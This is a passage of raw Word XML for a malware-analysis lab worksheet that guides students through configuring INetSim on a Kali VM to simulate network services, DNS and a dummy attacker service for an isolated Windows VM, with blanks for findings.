      </w:r>
    </w:p>
    <w:p w14:paraId="00000061" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>(It is recommended to create a separate configuration folder like this for every Malware you investigate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000062" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Use your preferred file editor and open ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>inetsim.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">’, and search for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>service_bind_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> section. Uncomment ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>service_bind_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>’ line and change the value to “0.0.0.0”. This will enable access from any site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000063" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00000000" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">Run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using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">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--config=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>inetsim.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> --data-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">=data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000064" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Wait until you see “simulation running”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000065" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000066" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000067"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Go to your Windows VM, open the browser, and navigate to your favorite website. If your VM is properly configured, you should not be able to reach that website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000068" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000069"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Go back to your Kali VM, and kill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using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>ctrl+c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006A"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Open the log file, and report your findings below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11B736"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6C" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000006D" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001F9BEF"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6E" w14:textId="76C83164" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000006F" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000070"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Open the configuration file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>again, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>dns_default_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be your Kali’s IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000071"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Before running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disable the local DNS resolver by typing  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000072" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> disable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>systemd-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>resolved.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00000073" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000074"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Run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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>again, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> go back to your Windows VM. Open the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>browser, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> navigate to another website. What do you see? Include a screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F788AF"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75" w14:textId="245364FF" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000076" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09284164"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77" w14:textId="3C0697C2" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000078" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000079"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Go back to your Kali VM, and kill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using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>ctrl+c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007B" w14:textId="1EE393D2" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Open the new log file, and report your findings below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE86A7B"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7C" w14:textId="36B94FCC" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000007D" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55784EE2"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7F" w14:textId="0464078F" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000080"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Can you briefly explain what you learned from the log file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0137B724"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81" w14:textId="576B19E4" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000082" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CF4517"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83" w14:textId="387D401B" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000084" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000085" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00000000" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part  6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Configuring </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>INetSim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Simulate our Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000086"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By default,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is configured to listen and simulate a list of known services. To simulate an attacker, we may need to configure our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>INetSim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> to respond to packets sent on an unknown port number. To do that, we need to configure a dummy service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000087" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000088" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the configuration file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>again, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> look for the dummy service. Can you configure it to simulate the attacker of the Malware we investigate?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000089" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000008A" w14:textId="165BA3C6" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Describe your steps and conclusions below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B204F94"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8C" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000008D" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58DA9D7F" w14:textId="577A4D0D" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>--------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000008E" w14:textId="0D5C1982" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000008F" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E7527C">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0F54" w14:textId="77777777" w:rsidR="00455F82" w:rsidRDefault="00455F82">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="32F71885" w14:textId="77777777" w:rsidR="00455F82" w:rsidRDefault="00455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38A9A9" w14:paraId="0876C019" w14:textId="77777777" w:rsidTr="0F38A9A9">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="008A5118" w14:textId="524115B5" w:rsidR="0F38A9A9" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="506EBE45" w14:textId="5658244D" w:rsidR="0F38A9A9" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
